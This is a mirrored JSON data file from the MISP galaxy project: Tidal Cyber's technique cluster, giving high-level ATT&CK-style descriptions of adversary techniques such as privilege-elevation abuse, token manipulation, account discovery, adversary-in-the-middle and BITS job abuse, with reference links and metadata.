mirror of
https://github.com/MISP/misp-galaxy.git
synced 2024-11-22 14:57:18 +00:00
4098 lines
416 KiB
JSON
4098 lines
416 KiB
JSON
{
|
||
"authors": [
|
||
"Tidal Cyber"
|
||
],
|
||
"category": "Technique",
|
||
"description": "Tidal Technique Cluster",
|
||
"name": "Tidal Technique",
|
||
"source": "https://app-api.tidalcyber.com/api/v1/technique/",
|
||
"type": "technique",
|
||
"uuid": "298b6aee-981b-4fd8-8759-a2e72ad223fa",
|
||
"values": [
|
||
{
|
||
"description": "Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.<sup>[[TechNet How UAC Works](https://app.tidalcyber.com/references/bbf8d1a3-115e-4bc8-be43-47ce3b295d45)]</sup><sup>[[sudo man page 2018](https://app.tidalcyber.com/references/659d4302-d4cf-41af-8007-aa1da0208aa0)]</sup> An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.<sup>[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]</sup><sup>[[Fortinet Fareit](https://app.tidalcyber.com/references/d06223d7-2d86-41c6-af23-50865a1810c0)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "ac7d9875-d18b-48f6-93e6-47c565f9526b",
|
||
"value": "Abuse Elevation Control Mechanism"
|
||
},
|
||
{
|
||
"description": "Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\n\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7)) or used to spawn a new process (i.e. [Create Process with Token](https://app.tidalcyber.com/technique/ef0e0599-6543-499d-8409-ef449da5c38a)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.<sup>[[Pentestlab Token Manipulation](https://app.tidalcyber.com/references/243deb44-4d47-4c41-bd5d-262c4319cce5)]</sup>\n\nAny standard user can use the <code>runas</code> command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "1423e8c1-7cbf-4cfb-a70d-b6fe8e1a8041",
|
||
"value": "Access Token Manipulation"
|
||
},
|
||
{
|
||
"description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418) to set malicious changes into place.<sup>[[CarbonBlack LockerGoga 2019](https://app.tidalcyber.com/references/9970063c-6df7-4638-a247-6b1102289372)]</sup><sup>[[Unit42 LockerGoga 2019](https://app.tidalcyber.com/references/8f058923-f2f7-4c0e-b90a-c7a0d5e62186)]</sup>\n\nIn Windows, [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, <code>Set-LocalUser</code> and <code>Set-ADAccountPassword</code> [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlets may be used by adversaries to modify user accounts. In Linux, the <code>passwd</code> utility may be used to change passwords. Accounts could also be disabled by Group Policy. \n\nAdversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) objective. ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "847fcc8a-e74d-41e2-9f05-8d79d990cc04",
|
||
"value": "Account Access Removal"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).\n\nAdversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.\n\nFor examples, cloud environments typically provide easily accessible interfaces to obtain user lists.<sup>[[AWS List Users](https://app.tidalcyber.com/references/517e3d27-36da-4810-b256-3f47147b36e3)]</sup><sup>[[Google Cloud - IAM Servie Accounts List API](https://app.tidalcyber.com/references/3ffad706-1dac-41dd-b197-06f22fec3b30)]</sup> On hosts, adversaries can use default [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "6736995e-b9ea-401b-81fa-6caeb7a17ce3",
|
||
"value": "Account Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups.<sup>[[FireEye SMOKEDHAM June 2021](https://app.tidalcyber.com/references/a81ad3ef-fd96-432c-a7c8-ccc86d127a1b)]</sup> These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. \n\nIn order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Containers",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "65f7482c-485b-4fd7-80f5-0ec6e923ac4d",
|
||
"value": "Account Manipulation"
|
||
},
|
||
{
|
||
"description": "Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.<sup>[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)]</sup><sup>[[CrowdStrike Access Brokers](https://app.tidalcyber.com/references/0f772693-e09d-5c82-85c2-77f5fee39ef0)]</sup><sup>[[Krebs Access Brokers Fortune 500](https://app.tidalcyber.com/references/37d237ae-f0a8-5b30-8f97-d751c1560391)]</sup> In some cases, adversary groups may form partnerships to share compromised systems with each other.<sup>[[CISA Karakurt 2022](https://app.tidalcyber.com/references/5a9a79fa-532b-582b-9741-cb732803cd22)]</sup>\n\nFootholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://app.tidalcyber.com/technique/05a5318f-476d-44c1-8a85-9466295d31dd)) or established access via [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4). In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.<sup>[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)]</sup>\n\nBy leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.<sup>[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)]</sup><sup>[[CrowdStrike Access Brokers](https://app.tidalcyber.com/references/0f772693-e09d-5c82-85c2-77f5fee39ef0)]</sup>\n\nIn some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf), [Multi-Factor Authentication Interception](https://app.tidalcyber.com/technique/600d45ec-cb9c-47b8-ae94-326471ebb007), or even [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f).\n\n**Note:** while this technique is distinct from other behaviors such as [Purchase Technical Data](https://app.tidalcyber.com/technique/56ab198f-f8bb-4fe9-bd85-5975d4d3863b) and [Credentials](https://app.tidalcyber.com/technique/e5d9c785-61bd-483f-b2ac-5bd9a8641b22), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "478da817-1914-50f6-b1fd-434081a34354",
|
||
"value": "Acquire Access"
|
||
},
|
||
{
|
||
"description": "Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.<sup>[[TrendmicroHideoutsLease](https://app.tidalcyber.com/references/527de869-3c76-447c-98c4-c37a2acf75e2)]</sup> Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.<sup>[[Free Trial PurpleUrchin](https://app.tidalcyber.com/references/841f397d-d103-56d7-9854-7ce43c684879)]</sup> Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b), including from residential proxy services.<sup>[[amnesty_nso_pegasus](https://app.tidalcyber.com/references/9e40d93a-fe91-504a-a6f2-e6546067ba53)]</sup><sup>[[FBI Proxies Credential Stuffing](https://app.tidalcyber.com/references/17f9b7b0-3e1a-5d75-9030-da79fcccdb49)]</sup><sup>[[Mandiant APT29 Microsoft 365 2022](https://app.tidalcyber.com/references/e141408e-d22b-58e4-884f-0cbff25444da)]</sup> Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3",
|
||
"value": "Acquire Infrastructure"
|
||
},
|
||
{
|
||
"description": "Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.\n\nAdversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.<sup>[[Botnet Scan](https://app.tidalcyber.com/references/ca09941c-fcc8-460b-8b02-d1608a7d3813)]</sup><sup>[[OWASP Fingerprinting](https://app.tidalcyber.com/references/ec89a48b-3b00-4928-8450-d2fbd307817f)]</sup> Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "a930437d-5a12-4dc4-b311-f5fd6a766c85",
|
||
"value": "Active Scanning"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323), [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243), or replay attacks ([Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.<sup>[[Rapid7 MiTM Basics](https://app.tidalcyber.com/references/33b25966-0ab9-4cc6-9702-62263a23af9c)]</sup>\n\nFor example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.<sup>[[ttint_rat](https://app.tidalcyber.com/references/f3e60cae-3225-4800-bc15-cb46ff715061)]</sup><sup>[[dns_changer_trojans](https://app.tidalcyber.com/references/082a0fde-d9f9-45f2-915d-f14c77b62254)]</sup><sup>[[ad_blocker_with_miner](https://app.tidalcyber.com/references/8e30f71e-80b8-4662-bc95-bf3cf7cfcf40)]</sup> Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens ([Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727)) and session cookies ([Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e)).<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup><sup>[[Token tactics](https://app.tidalcyber.com/references/e254e336-2e3e-5bea-a9e9-0f42f333b894)]</sup> [Downgrade Attack](https://app.tidalcyber.com/technique/257fffe4-d17b-4e63-a41c-8388936d6215)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.<sup>[[mitm_tls_downgrade_att](https://app.tidalcyber.com/references/af907fe1-1e37-4f44-8ad4-fcc3826ee6fb)]</sup><sup>[[taxonomy_downgrade_att_tls](https://app.tidalcyber.com/references/4459076e-7c79-4855-9091-5aabd274f586)]</sup><sup>[[tlseminar_downgrade_att](https://app.tidalcyber.com/references/8b5d46bf-fb4e-4ecd-b8a9-9c084c1864a3)]</sup>\n\nAdversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) and/or in support of a [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311).",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "d98dbf30-c454-42ff-a9f3-2cd3319cc0d9",
|
||
"value": "Adversary-in-the-Middle"
|
||
},
|
||
{
|
||
"description": "Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.<sup>[[Mandiant APT29 Eye Spy Email Nov 22](https://app.tidalcyber.com/references/452ca091-42b1-5bef-8a01-921c1f46bbee)]</sup> ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "8a7afe43-b814-41b3-8bd8-e1301b8ba5b4",
|
||
"value": "Application Layer Protocol"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.<sup>[[Prevailion DarkWatchman 2021](https://app.tidalcyber.com/references/449e7b5c-7c62-4a63-a676-80026a597fc9)]</sup> For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7)) to evade.<sup>[[ESET Grandoreiro April 2020](https://app.tidalcyber.com/references/d6270492-986b-4fb6-bdbc-2e364947847c)]</sup>\n\nAdversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c) commands and [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "3b2f435a-8666-43b5-9883-f2808eebd726",
|
||
"value": "Application Window Discovery"
|
||
},
|
||
{
|
||
"description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.<sup>[[DOJ GRU Indictment Jul 2018](https://app.tidalcyber.com/references/d65f371b-19d0-49de-b92b-94a2bea1d988)]</sup> Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "ebd3f870-c513-4fb0-b133-15ffc1f91db2",
|
||
"value": "Archive Collected Data"
|
||
},
|
||
{
|
||
"description": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.<sup>[[ESET Attor Oct 2019](https://app.tidalcyber.com/references/fdd57c56-d989-4a6f-8cc5-5b3713605dec)]</sup>\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "2be5c67a-edae-4083-8b6d-f99eaa622ed4",
|
||
"value": "Audio Capture"
|
||
},
|
||
{
|
||
"description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. \n\nIn cloud-based environments, adversaries may also use cloud APIs, data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data.<sup>[[Mandiant UNC3944 SMS Phishing 2023](https://app.tidalcyber.com/references/3a310dbd-4b5c-5eaf-a4ce-699e52007c9b)]</sup> \n\nThis functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) and [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f) to identify and move files, as well as [Cloud Service Dashboard](https://app.tidalcyber.com/technique/315ce434-ad6d-4dae-a1dd-6db944a44422) and [Cloud Storage Object Discovery](https://app.tidalcyber.com/technique/92761d92-a288-4407-a112-bb2720f07d07) to identify resources in cloud environments.",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "107ad6c5-79b1-468c-9519-1578bee2ac49",
|
||
"value": "Automated Collection"
|
||
},
|
||
{
|
||
"description": "Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.<sup>[[ESET Gamaredon June 2020](https://app.tidalcyber.com/references/6532664d-2311-4b38-8960-f43762471729)]</sup> \n\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://app.tidalcyber.com/technique/89203cae-d3f1-4eef-9b5a-29042eb05d19) and [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88).",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "26abc19f-5968-45f1-aa1f-f35863a2f804",
|
||
"value": "Automated Exfiltration"
|
||
},
|
||
{
|
||
"description": "Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM).<sup>[[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)]</sup><sup>[[Microsoft BITS](https://app.tidalcyber.com/references/3d925a69-35f3-4337-8e1e-275de4c1783e)]</sup> BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\n\nThe interface to create and manage BITS jobs is accessible through [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) and the [BITSAdmin](https://app.tidalcyber.com/software/52a20d3d-1edd-4f17-87f0-b77c67d260b4) tool.<sup>[[Microsoft BITS](https://app.tidalcyber.com/references/3d925a69-35f3-4337-8e1e-275de4c1783e)]</sup><sup>[[Microsoft BITSAdmin](https://app.tidalcyber.com/references/5b8c2a8c-f01e-491a-aaf9-504ee7a1caed)]</sup>\n\nAdversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://app.tidalcyber.com/technique/fa1507f1-c763-4af1-8bd9-a2fb8f7904be)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.<sup>[[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]</sup><sup>[[Mondok Windows PiggyBack BITS May 2007](https://app.tidalcyber.com/references/7dd03a92-11b8-4b8a-9d34-082ecf09a6e4)]</sup><sup>[[Symantec BITS May 2007](https://app.tidalcyber.com/references/e5962c87-0d42-46c2-8757-91f264fc570f)]</sup> BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).<sup>[[PaloAlto UBoatRAT Nov 2017](https://app.tidalcyber.com/references/235a1129-2f35-4861-90b8-1f761d89b0f9)]</sup><sup>[[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]</sup>\n\nBITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88).<sup>[[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "6b278e5d-7383-42a4-9425-2da79bbe43e0",
|
||
"value": "BITS Jobs"
|
||
},
|
||
{
|
||
"description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.<sup>[[Microsoft Run Key](https://app.tidalcyber.com/references/0d633a50-4afd-4479-898e-1a785f5637da)]</sup><sup>[[MSDN Authentication Packages](https://app.tidalcyber.com/references/e9bb8434-9b6d-4301-bfe2-5c83ceabb020)]</sup><sup>[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)]</sup><sup>[[Cylance Reg Persistence Sept 2013](https://app.tidalcyber.com/references/9e9c745f-19fd-4218-b8dc-85df804ecb70)]</sup><sup>[[Linux Kernel Programming](https://app.tidalcyber.com/references/70f31f19-e0b3-40b1-b8dd-6667557bb334)]</sup> These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\n\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
